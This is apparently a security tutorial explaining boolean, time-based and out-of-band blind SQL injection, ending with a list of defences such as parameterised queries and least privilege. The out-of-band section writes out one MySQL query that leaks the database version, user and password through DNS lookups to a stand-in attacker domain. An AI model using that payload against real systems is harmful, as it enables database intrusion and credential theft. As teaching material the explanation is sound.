Blind SQL Injection is a type of SQL Injection attack that exists when the application doesn’t necessarily return the return of a SQL query to the front end, unlike in-band SQL Injection, the SQLi query doesn’t return direct output to the application thus it may take longer for the attacker to exploit. Blind SQL Injection has three types: Boolean-Based SQLi Boolean-Based (Content-Based) Blind SQLi technique asks the database True or False questions and determines the answer based on the application's response. Depending on the result, the content within the HTTP response will change, or remain the same. Time-Based SQLi Time-Based SQLi technique analyzes and checks if there is a delay in the request-response based on injecting a time-intensive operation payload, and by performing a boolean check and performing a delay or not, the main down back of this type is that it requires a stable internet connection to differentiate extract data correctly. Out-of-Band (OOB) SQLi Out-of-Band (OOB) SQLi technique where an attacker uses external resources to exfiltrate data from the database by performing HTTP or DNS requests to an external server, the main down back of this technique is that it depends on the capability of a database system to initiate outbound DNS or HTTP request may need to rely on the function available.

In the case of Boolean-Based SQLi, The attacker makes different SQL queries that ask the database TRUE or FALSE questions. Then they analyze differences in responses between TRUE and FALSE statements and it’s called ‘Conditional Response’. Sometimes the TRUE/FALSE indicator might not be based on query return it may be based on the query being correct in this case we call it “Conditional Errors’.

Boolean-Based SQLi Data Exfiltration

• Conditional Response: The process will be done by performing boolean checks based on conditions to extract the content of the database for example by providing and condition that will return True/False if the first table name starts with character ‘A’ etc..., till an attacker can extract all the content of the database with the help of functions such as ‘SUBSTR()’, and internal database structure such as information_schema, The data can be extracted by inspecting the response of the application and differentiate between TRUE/FALSE statements.

• Conditional Errors: The process will be done by performing boolean checks based on conditions to extract the content of the database for example by providing and condition that will cause a database error using ‘to_char(1/0)’ if the first table name starts with character ‘A’ etc..., till an attacker can extract all the content of the database with the help of functions such as ‘SUBSTR()’, and internal database structure such as information_schema, The data can be extracted by inspecting the response of the application and differentiate between TRUE/FALSE statements based on an error is done or not.

In the case of Time-Based SQLi, The attacker makes the database perform a time-intensive operation. If the website does not return a response immediately, the web application is vulnerable to Blind SQL Injection. A popular time-intensive operation is the sleep operation.

Time-Based SQLi Data Exfiltration

• The process will be done by performing boolean checks based on conditions to extract the content of the database for example by providing and condition that will cause a sleep if the first table name starts with character ‘A’ etc..., till an attacker can extract all the content of the database with the help of functions such as ‘SUBSTR()’, and internal database structure such as information_schema, The data can be extracted by inspecting the response of the application and differentiate response time to check if the condition is TRUE or FALSE.

In the case of Out-of-Band (OOB) SQLi, The attacker makes the database perform external requests to an attacker server to confirm vulnerability existence, the most type of requests done is HTTP or DNS.

Out-of-Band (OOB) SQLi Data Exfiltration

• Via DNS: The attacker will perform a DNS request to the domain securitymeter-redteam.com using data exfiltrated as a subdomain for example using the following query (MySQL): ``` SELECT load_file(CONCAT('\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',securitymeter-redteam.com\SMVDB.txt')) `` This will cause the database to perform A DNS request to domain ‘’’ database_version.database_user.database_password. securitymeter-redteam.com ’’’ exposing (database version, username, and the password) to the attacker.

• Via HTTP: The attacker will perform an HTTP request to the domain securitymeter-redteam.com using data 4exfiltrated as GET parameters using UTL_HTTP Package for example if the database is ORACLE.

Main Defenses

• Use prepared statements (with Parameterized Queries)
• Whitelist input validation
• Escape user-supplied input
• Use Properly Constructed Stored Procedures

Additional Defenses

• Enforce Least Privilege
• Prevent the database from initiating outbound HTTP requests and DNS requests if possible.